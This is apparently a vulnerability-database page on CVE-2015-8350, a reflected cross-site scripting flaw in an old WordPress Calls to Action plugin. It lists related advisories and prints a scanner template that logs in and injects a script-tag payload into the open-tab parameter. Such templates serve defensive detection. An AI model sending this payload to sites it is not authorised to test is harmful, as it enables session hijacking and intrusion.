| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| WordPress Calls To Action 2.4.3 Cross Site Scripting Vulnerability | 3 Dec 201500:00 | – | zdt | |
| CVE-2015-8350 | 22 Dec 202501:17 | – | circl | |
| Calls to Action WordPress Plugin Reflective Cross-Site Scripting Vulnerability | 1 Dec 201500:00 | – | cnvd | |
| CVE-2015-8350 | 11 Sep 201720:00 | – | cve | |
| CVE-2015-8350 | 11 Sep 201720:00 | – | cvelist | |
| EUVD-2015-8234 | 7 Oct 202500:30 | – | euvd | |
| Two Reflected XSS Vulnerabilities in Calls to Action WordPress plugin | 7 Oct 201500:00 | – | htbridge | |
| CVE-2015-8350 | 11 Sep 201720:29 | – | nvd | |
| WordPress Calls To Action Plugin < 2.5.1 XSS Vulnerability | 12 Sep 201700:00 | – | openvas | |
| WordPress Calls To Action 2.4.3 Cross Site Scripting | 2 Dec 201500:00 | – | packetstorm |
id: CVE-2015-8350
info:
name: WordPress Calls to Action <=2.4.3 - Authenticated Reflected XSS
author: 0x_Akoko
severity: medium
description: |
Calls to Action plugin before 2.5.1 for WordPress contains stored XSS caused by unsanitized input in open-tab parameter in wp-admin/edit.php and wp-cta-variation-id parameter in ab-testing-call-to-action-example/, letting remote attackers inject arbitrary web script or HTML, exploit requires sending crafted requests.
impact: |
Attackers can execute arbitrary scripts in the context of the affected website, leading to session hijacking, defacement, or redirection.
remediation: |
Update to version 2.5.1 or later to fix the vulnerabilities.
reference:
- https://www.immuniweb.com/advisory/HTB23274
- https://seclists.org/bugtraq/2015/Dec/9
- https://nvd.nist.gov/vuln/detail/CVE-2015-8350
- https://plugins.trac.wordpress.org/changeset/1274208/cta
- http://packetstormsecurity.com/files/134598/WordPress-Calls-To-Action-2.4.3-Cross-Site-Scripting.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2015-8350
cwe-id: CWE-79
epss-score: 0.02645
epss-percentile: 0.83694
cpe: cpe:2.3:a:inboundnow:call_to_action:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 3
vendor: inboundnow
product: call_to_action
framework: wordpress
tags: seclists,cve,cve2015,wordpress,wp-plugin,xss,reflected,authenticated
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
GET /wp-login.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: status
status:
- 200
internal: true
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
matchers:
- type: dsl
dsl:
- 'status_code == 302'
- 'contains(header, "wordpress_logged_in")'
condition: and
internal: true
- raw:
- |
GET /wp-admin/edit.php?post_type=wp-call-to-action&page=wp_cta_global_settings&open-tab='><script>alert(document.domain)</script> HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "open-tab", "<script>alert(document.domain)</script>")'
- 'contains(content_type, "text/html")'
condition: and
# digest: 4a0a00473045022100bf0b4907d92cbfb1a512b674a3c7bd271b9732b3e3c3c9137694807711d7570602201bcb74a3bc679aac9b97eb43e67da10635199c02a7e5250948e0917c233a0475:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation